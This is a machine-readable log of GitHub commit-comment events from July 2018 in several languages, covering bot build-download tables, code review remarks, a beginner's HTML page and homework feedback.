{"id":"7922970934","type":"CommitCommentEvent","actor":{"login":"lanhaoxiang"},"repo":{"name":"gxchain/gxb-core"},"payload":{"comment":{"id":29605928,"position":null,"line":null,"path":null,"commit_id":"1bb61fe9e25bb4bb4550d414e7bec7b0efde4ad5","created_at":"2018-07-05T12:43:26Z","updated_at":"2018-07-05T12:43:26Z","author_association":"COLLABORATOR","body":"@luozhaohui Thanks for you contribution, if you are interested  you can  leave your gxchain account here, you will receive the  bounty soon. "}},"created_at":"2018-07-05T12:43:26Z"}
{"id":"7922973665","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29605931,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:43:56Z","updated_at":"2018-07-05T12:43:56Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:43:56Z"}
{"id":"7922976042","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29605943,"position":null,"line":null,"path":null,"commit_id":"9c34f865c185f8e186f883f998fc84043ad2627b","created_at":"2018-07-05T12:44:23Z","updated_at":"2018-07-05T12:44:23Z","author_association":"OWNER","body":"![screenshot from 2018-07-05 19-43-18](https://user-images.githubusercontent.com/21073227/42323873-c96f6700-808b-11e8-9706-97383aa0a610.png)\r\n"}},"created_at":"2018-07-05T12:44:23Z"}
{"id":"7922977096","type":"CommitCommentEvent","actor":{"login":"jordiascension"},"repo":{"name":"khouyaoui/scriptsBash"},"payload":{"comment":{"id":29605946,"position":null,"line":null,"path":null,"commit_id":"e99a6f7de227494e4ca98c23e0d6fbfe28c61639","created_at":"2018-07-05T12:44:34Z","updated_at":"2018-07-05T12:44:34Z","author_association":"COLLABORATOR","body":"Este código esta muy bien para conectarse con el servidor. Pero el código que había solicitado era para crear una base de datos tanto en Windows como en Linux."}},"created_at":"2018-07-05T12:44:34Z"}
{"id":"7922979289","type":"CommitCommentEvent","actor":{"login":"lucaspelloni2"},"repo":{"name":"eureka-blockchain-solutions/eureka-platform"},"payload":{"comment":{"id":29605948,"position":5,"line":5,"path":"src/smartcontracts/truffle.js","commit_id":"5adfbb3e0e1c0c2a26ce7179df14f6f93ca189de","created_at":"2018-07-05T12:44:59Z","updated_at":"2018-07-05T12:44:59Z","author_association":"MEMBER","body":"Change the default port to 7545. The best thing would be a exported variable with the port number. \r\n--> Web3 Provider shall be instantiated with the same port as the truffle config file. "}},"created_at":"2018-07-05T12:44:59Z"}
{"id":"7922979989","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29605956,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:45:09Z","updated_at":"2018-07-05T12:45:09Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:45:09Z"}
{"id":"7922980514","type":"CommitCommentEvent","actor":{"login":"ascend2018"},"repo":{"name":"fo40225/tensorflow-windows-wheel"},"payload":{"comment":{"id":29605960,"position":null,"line":null,"path":null,"commit_id":"8ac2b171ad5639a527a1b6945dffbdc3382905cf","created_at":"2018-07-05T12:45:14Z","updated_at":"2018-07-05T12:45:14Z","author_association":"NONE","body":"tensorflow for deep learning "}},"created_at":"2018-07-05T12:45:14Z"}
{"id":"7922983023","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/test1"},"payload":{"comment":{"id":29605978,"position":null,"line":null,"path":null,"commit_id":"d40f66e61b127066605a44bd9c927c55be3594e4","created_at":"2018-07-05T12:45:41Z","updated_at":"2018-07-05T12:45:41Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-05T12:45:41Z"}
{"id":"7922983696","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/test1"},"payload":{"comment":{"id":29605981,"position":null,"line":null,"path":null,"commit_id":"d40f66e61b127066605a44bd9c927c55be3594e4","created_at":"2018-07-05T12:45:49Z","updated_at":"2018-07-05T12:45:49Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-05T12:45:49Z"}
{"id":"7922985308","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29605983,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:46:08Z","updated_at":"2018-07-05T12:46:08Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:46:08Z"}
{"id":"7922985794","type":"CommitCommentEvent","actor":{"login":"kyguy"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29605984,"position":1,"line":1,"path":"docker-images/stunnel/Dockerfile","commit_id":"6077a7ffef80af4a335cd518f1cb9ee961afeffb","created_at":"2018-07-05T12:46:13Z","updated_at":"2018-07-05T12:46:13Z","author_association":"MEMBER","body":"Agreed"}},"created_at":"2018-07-05T12:46:13Z"}
{"id":"7922989393","type":"CommitCommentEvent","actor":{"login":"sawantsanket"},"repo":{"name":"sawantsanket/CuelogicGitHubTraining"},"payload":{"comment":{"id":29605991,"position":3,"line":1,"path":"Index.html","commit_id":"b2a55744da81e7747c161ca5e8fd241c47baf6f6","created_at":"2018-07-05T12:46:53Z","updated_at":"2018-07-05T12:46:53Z","author_association":"OWNER","body":"text changed"}},"created_at":"2018-07-05T12:46:53Z"}
{"id":"7922993682","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29606009,"position":null,"line":null,"path":null,"commit_id":"9c34f865c185f8e186f883f998fc84043ad2627b","created_at":"2018-07-05T12:47:42Z","updated_at":"2018-07-05T12:47:42Z","author_association":"OWNER","body":"Наверно будет хорошим решением слить HAL для разных серий по базовым модулям: SysClock, GPIO, DMA, NVIC"}},"created_at":"2018-07-05T12:47:42Z"}
{"id":"7922994783","type":"CommitCommentEvent","actor":{"login":"Nayaral"},"repo":{"name":"Nayaral/site"},"payload":{"comment":{"id":29606012,"position":null,"line":null,"path":null,"commit_id":"6f7a52e76d1fd831a1bdd97035d6ac7a42dbb364","created_at":"2018-07-05T12:47:55Z","updated_at":"2018-07-05T12:47:55Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n<meta charset=\"utf-8\">\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n         <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n  <title></title>\r\n       <link href=\"css/bootstrap.min.css\" rel=\"stylesheet\">\r\n     <script src=\"js/bootstrap.min.js\"></script>\r\n     <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\r\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\r\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\r\n    </head>\r\n    <nav class=\"navbar navbar-default\" role=\"navigation\">\r\n  <div class=\"container-fluid\">\r\n    <div class=\"navbar-header\">\r\n      <a class=\"navbar-brand\" href=\"#\">GOOD TRIP</a>\r\n        <button type=\"button\" class=\"navbar-toggle\"\r\n                              data-toggle=\"collapse\" data-target=\"#navbarToCollapse\">\r\n          <span class=\"sr-only\">Toggle header</span>\r\n          <span class=\"icon-bar\"></span>\r\n          <span class=\"icon-bar\"></span>\r\n          <span class=\"icon-bar\"></span>\r\n      </button>\r\n    </div>\r\n    <div class=\"collapse navbar-collapse\" id=\"navbarToCollapse\">\r\n      <ul class=\"nav navbar-nav\">\r\n        <li class=\"active\"><a href=\"#\">HOME</a></li>\r\n        <li><a href=\"#\">SERVIÇOS</a></li>\r\n                    <li><a href=\"#\">HOTÉIS</a></li>\r\n        <li><a href=\"#\">RESERVAS</a></li>\r\n      </ul><ul class=\"nav navbar-nav\">\r\n        <li><a href=\"#\">QUEM SAMOS</a></li>\r\n        <li><a href=\"#\">LOCALIZAÇÃO</a></li>\r\n                    <li><a href=\"#\">PROMOÇÕES</a></li>\r\n        <li><a href=\"#\">CONTATOS</a></li>\r\n      </ul>\r\n        <form class=\"navbar-form navbar-right\" role=\"search\" action=\"https://www.google.com.br/search?q=\">\r\n          <div class=\"form-group\">\r\n            <input type=\"text\" class=\"form-control\" placeholder=\"Pesquisar\">\r\n        </div>\r\n        <button type=\"submit\" class=\"btn btn-default\">\r\n         <span class=\"glyphicon glyphicon-search\"></span>\r\n          </button>\r\n        </form>\r\n      </div>\r\n  </div>\r\n  </nav>\r\n<div class=\"container\">\r\n  <div id=\"simpleCarousel\" class=\"carousel slide\"\r\n      data-ride=\"carousel\"\r\n      data-interval=\"3000\">\r\n    <ol class=\"carousel-indicators\">\r\n      \r\n      </ol>\r\n    <div class=\"carousel-inner\">\r\n     <div class=\"item active\">\r\n          <img src=\"imagens/imagem1.jpg\" alt=\"imagem 1\"/>\r\n        <div class=\"carousel-caption\">\r\n          <h2></h2>\r\n        </div>\r\n        </div>\r\n      <div class=\"item\">\r\n          <img src=\"imagens/imagem2.jpg\" alt=\"imagem 2\"/>\r\n          <div class=\"carousel-caption\">\r\n          <h2></h2>\r\n        </div>\r\n        </div>\r\n      <div class=\"item\">\r\n          <img src=\"imagens/imagem3.jpg\" alt=\"imagem 3\"/>\r\n        <div class=\"carousel-caption\">\r\n          <h2></h2>\r\n        </div>\r\n        </div>\r\n      </div>\r\n    <a class=\"left carousel-control\" href=\"#simpleCarousel\" role=\"button\" data-slide=\"prev\">\r\n      <span class=\"glyphicon glyphicon-chevron-left\"></span>\r\n    </a>\r\n    <button>\r\n      <li class=\"active\"><a href=\"#\">INICIAR COMPRA</a></li>\r\n    </button>\r\n     <footer class=\"container-fluid bg-4 text-center\" style=\"background: #AFEEEE;\">\r\n  <p></p> \r\n  </footer>\r\n  <form method=\"post\" action=\"SERVIÇOS.html\">\r\n</body>\r\n</html>"}},"created_at":"2018-07-05T12:47:55Z"}
{"id":"7922997664","type":"CommitCommentEvent","actor":{"login":"ausi"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29606023,"position":7,"line":61,"path":"src/Resources/contao/classes/DropZone.php","commit_id":"a87b6466dca4ac4b7842e91dce6acf440fc7b411","created_at":"2018-07-05T12:48:24Z","updated_at":"2018-07-05T12:48:24Z","author_association":"MEMBER","body":"@leofeyer the `str_replace()` isn’t very safe an can easily break, `json_encode()` should work correctly for almost all cases.\r\n\r\n@m-vo It would work :) I removed the extra quotes in my example code above."}},"created_at":"2018-07-05T12:48:24Z"}
{"id":"7922998665","type":"CommitCommentEvent","actor":{"login":"sushanweilai"},"repo":{"name":"sushanweilai/sushanweilai.github.io"},"payload":{"comment":{"id":29606026,"position":1,"line":1,"path":"CNAME","commit_id":"3e80831fcb94008868437d9e946f5c4a0269860e","created_at":"2018-07-05T12:48:36Z","updated_at":"2018-07-05T12:48:36Z","author_association":"OWNER","body":"shanqiu-art.top"}},"created_at":"2018-07-05T12:48:36Z"}
{"id":"7923003016","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29606035,"position":null,"line":null,"path":null,"commit_id":"172e8f483286e0f59ce0533740419d3014e49e45","created_at":"2018-07-05T12:49:24Z","updated_at":"2018-07-05T12:49:24Z","author_association":"NONE","body":"遅い時間までお疲れ様でした。熱意が非常に伝わり、こちらも嬉しかったです。\r\n\r\nさて、課題について2点+オマケを。\r\n・ポイント値引き分が反映されていません。\r\n・変数を使った計算結果がprintされていません。\r\nってことで残念ですが不正解です。計算自体は決して悪くないのに惜しい!\r\n忙しいとは思いますが、納期までに修正してみてください。\r\n(1行目のコードは提出物としては不要ですが、せっかく頑張ったので\r\n 先頭に#を入れてコメント行にしておいてください。)\r\n\r\nあ、オマケの話。ビールは英語でbeerと書きます。\r\n細かいですが、変数を付けるとき、カタカナ語は英語に直すのが一般的なので\r\n頭の片隅にでも置いといてください。"}},"created_at":"2018-07-05T12:49:24Z"}
{"id":"7923016478","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29606066,"position":null,"line":null,"path":null,"commit_id":"2da7ad206e0dd2c301a92370724f68dec4d4f56a","created_at":"2018-07-05T12:51:53Z","updated_at":"2018-07-05T12:51:53Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=371)"}},"created_at":"2018-07-05T12:51:53Z"}
